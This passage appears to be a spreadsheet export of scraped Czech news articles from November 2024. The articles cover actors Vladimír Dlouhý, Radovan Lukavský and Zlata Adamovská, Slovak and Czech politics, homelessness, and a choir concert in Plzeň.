    <t>Vladimír Dlouhý utíkal z&amp;nbsp;nemocnice do hospody. Utajil dvojčata a&amp;nbsp;bratra miliardáře Herec Vladimír Dlouhý byl letos oslavil krásné 66. narozeniny. Jeho život ale vyhasl předčasně kvůli rakovině žaludku. Svému krutému osudu šel ale svou neřízenou životosprávou tak trochu naproti. Neměl rád rozhovory, a také jich tolik za svůj život neposkytl. Vždy říkával, že za herce by měla mluvit jeho práce. Vladimír Dlouhý ale možná dobře věděl, proč se nechce bavit s novináři. Měl totiž několik tajemství, která byla prozrazena až po jeho smrti. Ne jedny, ale hned dvoje dvojčata Za života Vladimíra Dlouhého se vědělo, že má tři děti. Společně s první manželkou Gabrielou Heřmanovou měl dceru Danielu , která začala po maturitě studovat přírodovědeckou fakultu. Dva syny mu pak porodila herečka Petra Jungmannová . Dvojčata Jiří s Janem dnes hrají v seriálu Ulice a jdou tak ve stopách slavného tatínka. V jednom z rozhovoru ale odhalila zajímavou skutečnost herečka Jana Nagyová , která hrála s Vladimírem Dlouhým v seriálu Arabela. „Seznámili jsme se v roce 1979. Všichni nás tehdy dávali dohromady, ale on byl zadaný a já věděla, že má i dvojčátka,“ uvedla pro Aha. Ve finále tak dnes víme, že byl Vladimír Dlouhý minimálně pětinásobný otec. Nevlastní bratr je dnes miliardářem Dalším tajemstvím Vladimíra Dlouhého byl jeho nevlastní bratr Oliver . Ten se narodil poté, co se hercův otec s jeho maminkou rozvedl a on se znovu oženil. Všichni bratři byli spolu jedna ruka, hodně se podporovali. Oliver se ale nakonec vydal jiným směrem, než jeho bratři Vladimír s Michalem . Stal se z něj úspěšný a velmi bohatý podnikatel. Rozjel společnost, která je dnes hodnocena jako jeden z nejlepších start-upů na světě . Založil totiž vyhledávač letenek, který snadno všem najde lety všech dopravců a umí tak vyhledat tu nejvhodnější a nejvýhodnější možnou. Deník Blesk před časem uvedl, že majetek Olivera by se měl pohybovat asi okolo 10 miliard korun. „Přišel jsem s unikátním nápadem udělat aplikaci, která by takové vyhledávání zrychlila,“ odhalil Oliver moderátorovi Janu Krausovi v jeho show. Složitý konec života Naopak veřejně známé bylo, jak moc měl Vladimír Dlouhý blízko k alkoholu . Byl to ale takový profesionál, že i když pil, nikdy to nemělo negativní dopad na jeho práci. Už horší to ale bylo s jeho zdravím. V posledních dvou letech totiž bojoval s rakovinou a lékaři mu museli vzít polovinu žaludku. Tehdy mu naordinovali střídmý režim, což ale Dlouhý nikdy nedodržoval. Hrál prakticky do posledního dechu , lékaři ho pravidelně propouštěli z nemocnice na pár hodin, aby mohl odehrát představení. Cestou do divadla se ale nikdy nezapomněl stavit ve svém oblíbeném podniku na pražském Karlově náměstí . Nebyl závislý, jenom pil V posledních letech jeho života mu byl velkou oporou i bratr Michal Dlouhý . Ten vždy kategoricky odmítal, že by měl Vladimír alkoholu závislost. „Nebyl závislý, jenom pil. Vědomě a kontrolovaně. Kdyby chtěl, mohl přestat, byl pánem situace.“ Poslední filmovou rolí Vladimíra Dlouhého byla postava policisty v akčním thrilleru Kajínek, kterou dotočil z posledních sil. „ Vladimír se neskutečně držel, postsynchrony jezdil tři dny po sobě dodělávat přímo z nemocnice, z chemoterapie, a vždycky je ‚dal‘ naprosto perfektně. Až se nechtělo věřit,“ prozradil režisér filmu Petr Jákl mladší. Vladimír Dlouhý nakonec zemřel 20. června 2010, tehdy mu bylo teprve 52 let. Zdroje: zeny.iprima.cz , lifee.cz , krajskelisty.cz , blesk.cz</t>
  </si>
  <si>
    <t>20241101_111_3245000130_ddd095cf7fcc2249cf12.html</t>
  </si>
  <si>
    <t>ddd095cf7fcc2249cf12</t>
  </si>
  <si>
    <t>Kam emigrovat po volbách? V Česku najdete Trumpa z Temu, radí portál Američanům</t>
  </si>
  <si>
    <t>Kam emigrovat po volbách? V Česku najdete Trumpa z Temu, radí portál Američanům Příznivci republikána Donalda Trumpa ani demokratky Kamaly Harrisové nemusí zoufat, pokud jejich kandidát v úterních prezidentských volbách neuspěje. Evropa poskytuje útočiště pro oba tábory. Portál Politico nabízí několik států, kde se Američanům bude líbit. Republikánům doporučuje třeba Česko, které má prý vlastní verzi Trumpa – šéfa hnutí ANO Andreje Babiše. „Pokud jen přehlédnete několik menších odlišností – například oranžovou tvář – Česko nabízí svého vlastního obchodního magnáta, který se přeměnil v politického žháře: Andreje Babiše , který se brzy bude ucházet o návrat do vysokého úřadu,“ píše portál Politico . V odkazu na Trumpovo volební heslo Make America Great Again (udělat Ameriku znovu skvělou) poznamenal, že Babiš chce zase skvělou učinit Českou republiku . „Před volbami v příštím roce mu preference rostou,“ pokračuje. Babiše portál označuje za velkého příznivce nápadů republikánského střihu, jako jsou radikální přistěhovalecká politika a sliby snížení daní. „Má dokonce červenou kšiltovku s nápisem silné Česko, která připomíná Trumpovy ikonické čepice Make America Great Again,“ vysvětluje americkým čtenářům. „Stačí mu jen říkat Trump z Temu,“ míní. Temu je čínský internetový prodejce, který je vyhlášený levnými alternativami dražších výrobků. Temu má ale problémy s kvalitou a bezpečnostní některých produktů. Krajně pravicové skupině Proud Boys („Hrdí hoši“), která stojí za Trumpem, Politico vybral Durynsko na východě Německa . Zdůvodňuje to tím, že zde poprvé od prvního úspěchu ve 30. letech 20. století zvítězila nacistická strana, jak označil Alternativu pro Německo (AfD). „Zastánci nadřazenosti bílé rasy zde rovnou najdou spojence,“ dodává. Trumpově dělnické třídě by se podle Politica mohlo líbit v Maďarsku , které označuje za nový průmyslový ráj s automobilkami a továrnami na baterie a s vyspělou čínskou technologií a kapitálem. „Bohužel nemůžete nosit zbraně tak svobodně jako v USA , ale není zde smrtonosnější zbraně než doma pálené pálinky (ovocná pálenka) – díky (Viktoru) Orbánovi osvobozená od daní.“ Demokraté, kteří neuznávají hranice států, mohou po případném Trumpově vítězství zamířit na Baleárské ostrovy ve Středomoří. Vláda španělského premiéra Pedra Sáncheze se totiž vzpírá trendu států Evropské unie zpřísnit přistěhovalectví. „Demokraté toužící po životě s vínem a revolucí a po tom, aby jejich daně přispěly ke štědřejšímu sociálnímu státu, by mohli skončit ve Francii ,“ nabízí Politico s tím, že luxus by zase mohli chtít hledat na jihu na Riviéře. V tomto případě však portál varuje, že přímořská oblast je střediskem krajní pravice. Jasno má Politico také v tom, kam by se mohli uchýlit anarchističtí flamendři a zelení nadšenci. Pro ty první vidí jako ideál Amsterdam , pro ekology zase Brusel , kde šéfka Evropské komise Ursula von der Leyenová slibuje dekarbonizovat hospodářství. „Jen se musíte připravit každý rok na zhruba osm měsíců nepřetržitého deště,“ dodal o unijní metropoli bruselský portál. Autor: ČTK Autor ČTK</t>
  </si>
  <si>
    <t>20241101_112_3245001357_5e0890a0937d3b08e3b1.html</t>
  </si>
  <si>
    <t>5e0890a0937d3b08e3b1</t>
  </si>
  <si>
    <t>Ficova vláda v křeči. Koalice bojuje s rebely, zachraňovat ji musel těžce nemocný poslanec</t>
  </si>
  <si>
    <t>Ficova vláda v křeči. Koalice bojuje s rebely, zachraňovat ji musel těžce nemocný poslanec Slovenský premiér Robert Fico budí pozornost v ruské propagandistické televizi, bouří se proti němu lékaři a mezitím se mu rozpadá jeho vládní koalice. Ta by oficiálně měla mít převahu čtyř hlasů nad opozicí, ale realita je jiná. Trojice jeho zákonodárců okolo Rudolfa Huliaka totiž aktuálně rebeluje a hlásí, že teď s vládou nebude hlasovat. Čtvrtý hlas patří Jánu Blcháčovi, který byl doposud v nemocnici, kde bojuje s rakovinou. Aby však Ficova koalice neměla zablokovaný parlament, povolala těžce nemocného Blcháče na hlasování. Na papíře má Ficova vládní koalice celkem 79 hlasů ve 150členné Národní radě SR , tedy v jednokomorovém slovenském parlamentu. Relativně těsná, ale přece jen většina, se kterou může vládnout. To by však nesměl nastat problém u Rudolfa Huliaka a jeho nejbližších kolegů. Poslanec zvolený na kandidátce Slovenské národní strany (SNS) místopředsedy parlamentu Andreje Danka se rozhodl přejít do otevřené rebelie. Huliak vede stranu Národní koalice, pro kterou žádá větší prostor ve vládní koalici. Po Dankovi třeba chtěl, aby v názvu jejich poslaneckého klubu byla zmíněna nejen SNS, ale i Huliakova Národní koalice. Když jej Danko odmítl, oba politici se rozkmotřili a Huliak vzal zbylé dva kolegy ze své strany – Pavla Ľuptáka a Ivana Ševčíka – z klubu SNS, čímž málem zanikl. Záchranu šéf SNS našel u Ficova Směru-SD, který mu „na hostování“ poslal poslance Dušana Muňka, čímž byla existence klubu uhájena. Huliakova rebelie však nekončí. Další hořkou pilulkou pro ně bylo odvolání nominanta jeho strany Štefana Kysela z čela Státní ochrany přírody SR. V uplynulých dnech tak Huliakova trojice vyhlásila stávku a odmítla se účastnit jednání v parlamentu. A jelikož zbývající hlas vládní většiny patří těžce nemocnému Jánu Blcháčovi z Hlasu-SD, bylo na spadnutí zablokování parlamentu, ve kterém by Ficova koalice nemusela nic schválit. Situaci zachraňuje těžce nemocný poslanec Situaci pro Ficovu koalici však zachránil právě Blcháč. Poslanec, který se od března léčí s rakovinou, byl doposud v nemocnici a v pracovní neschopnosti. V situaci, kdy kvůli Huliakově rebelii hrozila blokace Národní rady, se Blcháč ve středu objevil v poslanecké lavici, byť značně pohublý a s rouškou na obličeji. Podle informací portálu Nový ča s přitom ještě v úterý ležel v nemocnici. Sám Blcháč odmítá, že by ukončil svoji pracovní neschopnost účelově. „Koalice je funkční a (Igor) Matovič (slovenský expremiér a předseda hnutí Slovensko ; pozn. red.) a podobní se jdou roztrhat z toho, že jsem se rozhodl přijít do práce. Klidně by mi dopřáli nějakou nemoc, jen aby zablokovali parlament. Já se díky našim lékařům a sestrám cítím dobře a svobodně jsem se dnes rozhodl přijít do práce a přiložit ruku k dílu,“ napsal na svém facebookovém profilu poslanec Hlasu-SD. Dotazy na jeho konec pracovní neschopnosti považuje za „hyenismus“. Zmíněný Danko si neváhal kvůli Blcháčovu ukončenému pobytu v nemocnici navzdory těžké nemoci rýpnout do svého nového rivala. „Sobectví Huliaka a spol. je zodpovědné za to, že do parlamentu dnes musel přijít nemocný Ján Blcháč z Hlasu,“ pronesl Danko před médii. Huliak zároveň útočí na Danka . V rozhovoru pro Rádio Express se do šéfa SNS trefoval kvůli pití alkoholu . „ Andrej Danko by měl méně flirtovat s alkoholem a možná mu začne ta jedna buňka, co mu zůstala, nebo respektive to, co mu drží uši pohromadě, napovídat, že jsem se mu rok snažil vysvětlit, kde je můj problém,“ pronesl rebelující zákonodárce. Koalícia je funkčná a Matovič a podobní sa idú roztrhať z toho, že som sa rozhodol prísť do práce. Kľudne by mi dopriali... V rozhovoru pro portál Aktuality.sk navíc dodal , že nyní po Dankově SNS požaduje vedení jednoho ministerstva. Původně se měl Huliak stát šéfem resortu životního prostředí, ale pro jeho kontroverzní názory jej tehdejší prezidentka Zuzana Čaputová odmítla jmenovat. Fico nakonec místo něj vybral Tomáše Tarabu a právě do něj Huliak dnes rovněž tepe. redaktor CNN Prima NEWS Autor: Tomáš Kačmár Autor person Tomáš Kačmár</t>
  </si>
  <si>
    <t>314770</t>
  </si>
  <si>
    <t>372500</t>
  </si>
  <si>
    <t>20241101_113_3244967091_b946ec4ac0ddaae8c910.html</t>
  </si>
  <si>
    <t>b946ec4ac0ddaae8c910</t>
  </si>
  <si>
    <t>Radovan Lukavský za války pomáhal Američanům, zachránil ho Burian. Přišel o&amp;nbsp;ženu i&amp;nbsp;syna</t>
  </si>
  <si>
    <t>Radovan Lukavský za války pomáhal Američanům, zachránil ho Burian . Přišel o&amp;nbsp;ženu i&amp;nbsp;syna Patřil mezi poslední herecké bardy. Kumštýře, na které byla radost pohledět. Radovan Lukavský rozdával radost, prožil si ale také spoustu bolesti. Smrti se nebál, chtěl být se svými milovanými. Radovan Lukavský vyrůstal v rodině, kde byla víra v Boha na první příčce. On sám chodil pomáhat jeptiškám a ministrovat, takže se nebylo čemu divit, že si sám vybral dráhu kněze. Začal studovat církevní gymnázium v Praze , jeho rodičům se ale nedostávalo financí, takže nakonec musel odmaturovat na reálném gymnáziu v Českém Brodě . Jenže on tím nechtěl skončit. Toužil předávat vědomosti, chtěl být učitelem. Proto začal v hlavním městě studovat Univerzitu Karlovu . Druhá světová válka však jeho sny přerušila. V lágru se učil Hamleta Během okupace byl Radovan Lukavský totálně nasazený, přesto se odmítl vzdát se svého dalšího snu, kterým bylo herectví. Navzdory vůli rodičů. Proto nejprve v divadle Větrník vystupoval tajně, zvolil si pseudonym Karel Janota . Mimochodem, podle svědectví jeho kamaráda Přemysla Karbusického se Lukavský dokonce i v lágru učil Hamleta. A také tajně pomáhal zajatým Američanům. Nejprve jim nosil jídlo, později jim umožnil útěk. Po celý zbytek života s nimi zůstal v kontaktu, i když je dělila velká vzdálenost. Lukavský vrátil do Prahy , hodně mu v tomto ohledu pomohl Vlasta Burian , který ho zachránil z totálního nasazení a nabídl mu angažmá v jeho divadle. „ Vlasta Burian tehdy s humorem sobě vlastním napsal žádost na Arbeitsamt, že žádá o okamžité uvolnění herce Radovana Lukavského , kterého nezbytně potřebuje jako náhradu za odcházejícího Jaroslava Marvana ,“ vzpomínal Lukavský. V dokumentu režiséra Ondřeje Kepky také jedním dechem dodával, že Burianovi jeho rodná země po válce velice křivdila. Velká láska Když nacisté divadla zavřeli, na chvíli pracoval jako traťový dělník. Naštěstí se ozbrojený konflikt blížil ke konci a Lukavský mohl dokončit studia a vrhnout se s vervou do angažmá v Divadle na Vinohradech . Už na konzervatoři, kterou dodělal souběžně s univerzitou, potkal krásnou Ludmilu Motyčkovou , do které se zamiloval. Vzali se a v roce 1959 se jim narodil syn Ondřej. Půvabná blondýnka se pro kariéru svého manžela obětovala, zanechala práci vědkyně a starala se o domácnost. Později učila na základní škole. Herecká hvězda Radovana Lukavského totiž už v té době stoupala hodně vysoko. Bral své povolání jako poslání, ne pouze jako zaměstnání. A i když stále upřednostňoval divadlo, kupit se začaly i filmové role. Porazila rakovinu Zatímco diváci a fanoušci ho milovali, protože jim rozdával radost, v soukromí mu vždycky do smíchu nebylo. S manželkou toužili po dalších dětech, jejich plány však nabourala rakovina. Lékaři ji u Lukavské objevili při běžném chirurgickém zákroku, i proto to byl obrovský šok. Doktoři jí dávali několik měsíců života, ona se ale rozhodla bojovat a Lukavský stál při ní. Modlil se, aby to dobře dopadlo. Nakonec se tak opravdu stalo navzdory tomu, že to lékaři nemohli pochopit. Hercova paní už ale nemohla nikdy mít další potomky, to byla otřesná cena za úspěšnou léčbu. Oni to ale přijali, vrhli se do práce a užívali si štěstí, které jim bylo dáno. Díky synovi se manželé nakonec dočkali vnoučat Martina a Kláry. Ludmila Lukavská však krátce před svými osmdesátými narozeninami zemřela, pro herce to byla obrovská rána. Smrti se nebál Lukavský se upnul na práci a zbývající členy své rodiny. Tragédiím však nebyl konec. Když jednoho dne odjel se synem na chalupu, Ondřej Lukavský dostal těžký srdeční záchvat. Svému tatínkovi zemřel v náručí. Radovan Lukavský se sice snažil najít další smysl života, vrátil se do Národního divadla , ale postupně odcházel. Dostal zápal plic a skončil v nemocnici. Jeho vnučka Klára s ním byla do poslední chvíle. Vzpomínala, že dědeček se smrti nebál, protože ji považoval za možnost, jak se znovu setkat s milovanou manželkou a synem. Zemřel 10. března 2008 v Praze a opět se naplno ukázalo, jak noblesním člověkem byl . Přál si, aby mu do hrobu dali láhev dobrého vína . A také nechtěl, aby byl jeho pohřeb smuteční záležitostí. Měli se potkat lidé dobré vůle oděni do bílého. Zdroje: idnes.cz , blesk.cz , lifee.cz , super.cz , zeny.iprima.cz , ctidoma.cz</t>
  </si>
  <si>
    <t>20241101_114_3244967095_2f5978c2321c8ac97c5a.html</t>
  </si>
  <si>
    <t>2f5978c2321c8ac97c5a</t>
  </si>
  <si>
    <t>Život (mého bratra) bezdomovce na ulici</t>
  </si>
  <si>
    <t>Život (mého bratra) bezdomovce na ulici Spaní pod mostem, vysedávání na lavičkách, ubytovna a žebrání, tak si lidé představí bezdomovce. Je to ale celá realita? Jak to, že občas byste bezdomovce ani nepoznali? A jak se stanete bezdomovcem? Ne každý bezdomovec Vás bude obtěžovat u Hlavního nádraží v Praze a rozhodně nebude každý vyvalený na lavičce v parku v alkoholovém nebo drogovém oparu. Bez domova mohou být lidé, o nichž byste si to vůbec nepomysleli. Jak tedy žijí? Můj bratr je bezdomovcem z vlastní vůle, na ulici žije již pár let a pravděpodobně byste to do něj neřekli. Přivydělává si náhodnými pracemi a zachovává si to, co je pro něj nejdůležitější, svou důstojnost. Co to znamená? Například to, že jeho vedoucí neurčuje, kdy může odejít z práce, kdy má čas se najíst a kolik pauz je ještě přípustné. Znamená to ale i to, že se vždy stará o svou čistotu a nepřipustil by, aby ho lidé viděli, jak se válí na lavičce v parku. Bratr má své místo ve starším kempovacím stanu pod jedním z mostů u Prahy , ale občas přespává i ve svém autě, pozůstatku kariéry v konzultační společnosti. Jeho typický den začíná kolem rozednění, jedná se o jakýsi přirozený budíček. Pokud má nějakou práci na ten den naplánovanou, vydá se tam, jinak má dost času na čtení, kontemplaci. Odpoledne může jít navštívit přátele, rodinu, případně se dále vzdělávat a kolem soumraku se zase chystá jít spát. Samozřejmě, že si uvědomuje svoje štěstí v tom, že vlastní stan, auto, věci, které mu život usnadňují, že jeho přátelé i rodina mu jsou ochotni poskytnout svou sprchu, či dokonce místo na gauči. Má dokonce velké štěstí, že netrpí žádným psychickým onemocněním nebo postižením, na rozdíl od mnohých. Bratr často popisuje problémy svých známých na ulici, může se jednat o zdravotní problémy, které souvisí s jejich původními zdravotními omezeními, ale také s realitou života na ulici, ať už se jedná o potyčky či drobné úrazy. Dostupnost zdravotní péče je pro ně omezená, jelikož jsou mimo jiné stigmatizováni, a tak se jejich čas a neléčené nemoci zhoršují. To se podílí na jejich výzoru. Protože přístup k pračce či tekoucí teplé vodě většinou stojí nemalé finanční částky, většina těchto lidí raději své omezené finance vydává za jiné věci, ať už to je jídlo pro sebe, pro zvíře, nebo i alkohol . Tato omezení, hygienická i systémová, například problém se zajištěním ubytování či nedostupnost technologií, přispívají k tomu, že tito lidé zůstávají v cyklu a na ulici, i když si to nepřejí. Zatímco Matouš má svou záchrannou síť a místo, kam se vrátit, většina lidí bez domova tohle nemá. Denně řeší potyčky s muži zákona i mezi sebou, o vhodný přístřešek či právě drobné finanční částky, které mají. Překvapivými problémy z života na ulici může být nedostatek úložných prostor, ztráta korespondenční adresy, nebo čelení extrémním výkyvům počasí a zvířatům a hmyzu, které mohou tyto lidi ohrožovat i na životě. To vše se odráží na jejich vzhledu, který pak určuje to, zda si mohou najít práci (chtějí-li) a začlenit se zpět do společnosti. Podle bratra by byla potřeba větší systémová podpora lidí bez domova, ne-li dokonce univerzální základní příjem, který by jim umožnil postavit se zpět na nohy. To znamená najít si bydlení, upravit svůj vzhled, a poté si hledat práci. Je však společnost připravena pro dané lidi něco udělat? Podle bratra se na ulici často ocitají náhodou, kvůli dluhovým pastem, nedostatku odpovídající zdravotní péče, z důvodu úmrtí partnera a s tím spojeného nedostatku financí či ztrátou bydlení. Co to znamená? Že ne každý je na ulici dobrovolně jako bratr a je až příliš jednoduché nad těmito lidmi mávnout rukou, protože „nám se to stát nemůže“. Jak se bratr stal bezdomovcem? Čtěte zde . Zajímá vás, jak si vydělává? Čtěte zde !</t>
  </si>
  <si>
    <t>20241101_115_3245045019_c1e21264c23b42c01494.html</t>
  </si>
  <si>
    <t>c1e21264c23b42c01494</t>
  </si>
  <si>
    <t>Koncert sboru Pilsen Voice a skupiny Decode rozezní plzeňskou Buena Vistu</t>
  </si>
  <si>
    <t>Koncert sboru Pilsen Voice a skupiny Decode rozezní plzeňskou Buena Vistu „V klubu Buena Vista jsme teď s PiVem doma, a tak jsme si nemohli vybrat lepší místo pro náš hlavní koncert sezóny. Koncert se už tradičně jmenuje Pilsen Voice slaví!. Slavíme jím společně s diváky a našimi věrnými fanoušky další rok našeho sboru na plzeňské scéně,“ vysvětluje Lucie Hofmanová, sbormistryně sboru PIlsen Voice . Na koncertu, který se koná od 19 hodin v klubu Buena Vista v Kollárově ulici v Plzni , zazní nejen oblíbené songy, které k Pilsen Voice neodmyslitelně patří. Diváci se mohou těšit na novinky jako třeba hit od Justina Timberlake Can’t Stop the Feeling nebo song Creep od skupiny Radiohead . A to je jen malá ochutnávka toho, co je na koncertu čeká. Jako host koncertu přijala pozvání plzeňská rocková skupina Decode , která celý večer završí. „S Decode to byla láska na první pohled. Jsou naše krevní skupina. Milují hudbu, kterou dělají skvěle, a navíc jsou to výborní parťáci. Společně jsme nazkoušeli i několik společných písní, které na koncertu také zazní,“ dodává sbormistryně. Plzeňský sbor Pilsen Voice je známý svým širokým repertoárem, ve kterém najdete hity od Queen , Robieho Williamse, Michaela Jacksona , Pharella Williamse nebo třeba Karla Gotta . Vstupenky na koncert bude možné zakoupit přímo na místě. Autor: Stanislav Hlava Autor person Stanislav Hlava</t>
  </si>
  <si>
    <t>12310</t>
  </si>
  <si>
    <t>9850</t>
  </si>
  <si>
    <t>20241101_116_3244931672_33c6fe7c74d94c747662.html</t>
  </si>
  <si>
    <t>33c6fe7c74d94c747662</t>
  </si>
  <si>
    <t>Kam emigrovat po volbách? V Česku najdete Trumpa z Temu, radí portál Američanům Příznivci republikána Donalda Trumpa ani demokratky Kamaly Harrisové nemusí zoufat, pokud jejich kandidát v úterních prezidentských volbách neuspěje. Evropa poskytuje útočiště pro oba tábory. Portál Politico nabízí několik států, kde se Američanům bude líbit. Republikánům doporučuje třeba Česko, které má prý vlastní verzi Trumpa – šéfa hnutí ANO Andreje Babiše. „Pokud jen přehlédnete několik menších odlišností – například oranžovou tvář – Česko nabízí svého vlastního obchodního magnáta, který se přeměnil v politického žháře: Andreje Babiše , který se brzy bude ucházet o návrat do vysokého úřadu,“ píše portál Politico . V odkazu na Trumpovo volební heslo Make America Great Again (udělat Ameriku znovu skvělou) poznamenal, že Babiš chce zase skvělou učinit Českou republiku . „Před volbami v příštím roce mu preference rostou,“ pokračuje. Babiše portál označuje za velkého příznivce nápadů republikánského střihu, jako jsou radikální přistěhovalecká politika a sliby snížení daní. „Má dokonce červenou kšiltovku s nápisem silné Česko, která připomíná Trumpovy ikonické čepice Make America Great Again,“ vysvětluje americkým čtenářům. „Stačí mu jen říkat Trump z Temu,“ míní. Temu je čínský internetový prodejce, který je vyhlášený levnými alternativami dražších výrobků. Temu má ale problémy s kvalitou a bezpečnostní některých produktů. Krajně pravicové skupině Proud Boys („Hrdí hoši“), která stojí za Trumpem, Politico vybral Durynsko na východě Německa . Zdůvodňuje to tím, že zde poprvé od prvního úspěchu ve 30. letech 20. století zvítězila nacistická strana, jak označil Alternativu pro Německo (AfD). „Zastánci nadřazenosti bílé rasy zde rovnou najdou spojence,“ dodává. Trumpově dělnické třídě by se podle Politica mohlo líbit v Maďarsku , které označuje za nový průmyslový ráj s automobilkami a továrnami na baterie a s vyspělou čínskou technologií a kapitálem. „Bohužel nemůžete nosit zbraně tak svobodně jako v USA , ale není zde smrtonosnější zbraně než doma pálené pálinky (ovocná pálenka) – díky (Viktoru) Orbánovi osvobozená od daní.“ Demokraté, kteří neuznávají hranice států, mohou po případném Trumpově vítězství zamířit na Baleárské ostrovy ve Středomoří. Vláda španělského premiéra Pedra Sáncheze se totiž vzpírá trendu států Evropské unie zpřísnit přistěhovalectví. „Demokraté toužící po životě s vínem a revolucí a po tom, aby jejich daně přispěly ke štědřejšímu sociálnímu státu, by mohli skončit ve Francii ,“ nabízí Politico s tím, že luxus by zase mohli chtít hledat na jihu na Riviéře. V tomto případě však portál varuje, že přímořská oblast je střediskem krajní pravice. Jasno má Politico také v tom, kam by se mohli uchýlit anarchističtí flamendři a zelení nadšenci. Pro ty první vidí jako ideál Amsterdam , pro ekology zase Brusel , kde šéfka Evropské komise Ursula von der Leyenová slibuje dekarbonizovat hospodářství. „Jen se musíte připravit každý rok na zhruba osm měsíců nepřetržitého deště,“ dodal o unijní metropoli bruselský portál. Tehdejší premiér a předseda ANO Andrej Babiš ve volebním štábu hnutí během voleb do Evropského parlamentu v kšiltovce inspirované Donaldem Trumpem . Autor: ČTK Ilustrační snímek Autor: Profimedia.cz Andrej Babiš na tiskové konferenci stínové vlády hnutí ANO. (10. října 2024) Autor: Ladislav Křivan, MAFRA Donald Trump během kampaně ve Wisconsinu (30. října 2024) Autor: ČTK Kandidátka demokratů na prezidentku Kamala Harrisová . (24. října 2024) Autor: ČTK Trump kritizoval demokraty z popelářského vozu Autor: Reuters Kamala Harrisová během živého rozhovoru CNN v Pensylvánii (23. října 2024) Autor: ČTK Donald Trump na mítinku v New Yorku (27. října 2024) Autor: ČTK Donald Trump během kampaně ve Wisconsinu (30. října 2024) Autor: Reuters Hnutí ANO zahájilo hlavní fázi kampaně před krajskými volbami v Havraníkách nedaleko Znojma . U mikrofonu hovoří Andrej Babiš . (4. září 2024) Autor: Ladislav Křivan, MAFRA Předseda hnutí ANO Andrej Babiš (16. září 2024) Autor: Ladislav Křivan, MAFRA Donald Trump na mítinku ve městě Oaks v Pensylvánii (14. října 2024) Autor: ČTK Donald Trump na mítinku ve městě Oaks v Pensylvánii (14. října 2024) Autor: Reuters Kamala Harrisová v Pittsburghu (25. září 2024) Autor: Profimedia.cz Kamala Harrisová během návštěvy oblastí zasažených hurikánem Helene (5. října 2024) Autor: Reuters Kamala Harrisová a Joe Biden (26. září 2024) Autor: Profimedia.cz Autor: ČTK Autor ČTK</t>
  </si>
  <si>
    <t>951220</t>
  </si>
  <si>
    <t>20241101_117_3244939075_052fde9d60c873b7fcea.html</t>
  </si>
  <si>
    <t>052fde9d60c873b7fcea</t>
  </si>
  <si>
    <t>Zlatu Adamovskou manželé podváděli. Se Štěpánkem si začala, když byl ženatý</t>
  </si>
  <si>
    <t>Zlatu Adamovskou manželé podváděli. Se Štěpánkem si začala, když byl ženatý Zlata Adamovská a Petr Štěpánek se poprvé potkali během natáčení pohádky O stříbrném a zlatém vajíčku. Tenkrát pro ni byl jen starší kolega, on ji také příliš neřešil. Jikra přeskočila mnohem později. Slavní herci se často potkávali během společného natáčení. V soukromí však měli Zlatá Adamovská i Petr Štěpánek partnery a nikoho by asi tenkrát nenapadlo, že jsou si právě tito dva souzeni. Herečka chodila se známým hudebním skladatelem Vadimem Petrovem , nakonec se také vzali . Ovšem manželství nemělo dlouhého trvání po čtyřech letech šli od sebe. Petrov svoji drahou polovičku podváděl a také na něj nebylo příliš spolehnutí. Nevěru s Wolfovou mu ještě odpustila Adamovská však dlouho netruchlila. Netrvalo dlouho a v taxíku se zamilovala do novináře Radka Johna . Vypadali jako dokonalý pár. Pak se ale z novináře stal politik a manželství začalo hodně trpět. Přesto, že spolu měli dvě děti a Adamovská se všemožně snažila, aby vztah zachránila. Hodně dlouho mu tolerovala všechny jeho hříchy a prohřešky . Její trpělivost však přetekla ve chvíli, kdy na Johna praskl románek s někdejší modelkou Markétou Zámyslickou i to, že s ní počal nemanželské dítě. Jak už to tak bývá, najednou začaly vyplouvat na povrch nejrůznější informace, které by asi jinak zůstaly utajené. Veřejnost se tak například dozvěděla, že Adamovská s Johnem zdaleka neměli tak úžasné manželství, jak se dlouhodobě předpokládalo. Dokonce byli už jednou jen kousek od rozchodu, když ji podváděl s Pavlínou Wolfovou . Krizi ale tenkrát ještě zažehnali. Mimochodem, herečka se o manželově nevěře se Zámyslickou dozvěděla jen pár hodin předtím, než na toto téma začaly vycházet články v médiích. Snad i proto už neotálela a v roce 2010 podala žádost o rozvod. Cítila se ponížená a podvedená, navíc veřejně. „Požádala jsem ho, aby odešel. Nebylo to velké rozmýšlení , protože jen blázen si dvakrát znovu sedne na rozpálenou plotnu. Po jeho skoro dvouletém milostném poměru s Pavlínou Wolfovou jsem si řekla, že už podruhé to neskousnu,“ vysvětlovala . Po pětadvaceti společných letech tak šli od sebe. Manželka skončila v sanatoriu Adamovské samozřejmě nebylo dobře. Snad i proto uvítala, když se začala více stýkat s charismatickým a šarmantním Petrem Štěpánkem . Byl pro ni klidným přístavem v době smutku. On to navíc měl podobně. S jeho manželkou Vlastou Janečkovou to bylo velmi špatné. Byla nemocná, mluvilo se i o problémech s alkoholem . „Oba jsme tehdy postupně prožívali těžké chvíle v soukromí a možná právě to nás spojilo. Probírali jsme všechno možné,“ popisoval Štěpánek , jak jejich vztah začínal. Osud to zkrátka umí někdy zařídit hodně nečekaně a vlastně i zlomyslně. Vždyť žena, která musela překousnout dvě ponižující nevěry ze stran svých partnerů, si nový vztah začala s mužem, který byl stále ženatý . Někdo to právem mohl cítit jako velkou křivdu a paradox. Na druhou stranu je pravda, že srdci poručit nejde. Štěpánkova manželka zemřela v roce 2012 v sanatoriu, kam byla nakonec převezena po těžkém úraze, který se jí stal doma. Adamovská se Štěpánkem svoji lásku mohli ventilovat veřejně. Vždyť už dva dny po úmrtí Janečkové trávila Adamovská bez jakýchkoli tajností den i noc na jeho chalupě na Kokořínsku . „Ano“ řekla v horečkách To nic nemění na tom, že láska Adamovské a Štěpánka, zrozena na popelu jejich předchozích, je pevná a úžasná. Dokazují, že city mohou vzplanout v každém věku. Přesto, že se herečce do třetí svatby nechtělo, nakonec „neměla na vybranou“. Štěpánek ji vzal na romantickou dovolenou , na safari v Keni řekla „ano“. Byť přiznala, že v té chvíli měla horečku. Ale určitě si dobře uvědomovala, o co jde. A udělala samozřejmě dobře. Vzali se tajně v roce 2013, což dávalo logiku. Ani jeden z nich totiž nikdy nevyhledával publicitu. Tím spíš poté, čím vším si prošli. I dnes vypadají stále zamilovaně, jeden k druhému mají respekt. „Muži se mi dvořili vždycky, o nápadníky jsem nikdy neměla nouzi, ale když vám manžel pomůže do kabátu i doma v předsíni a přinese vám kytku, přestože nemáte svátek ani narozeniny, jsem z toho paf i po těch letech, co jsme spolu,“ rozplývala se blahem Adamovská. Sice to trvalo, cesta byla dlouhá a trnitá. 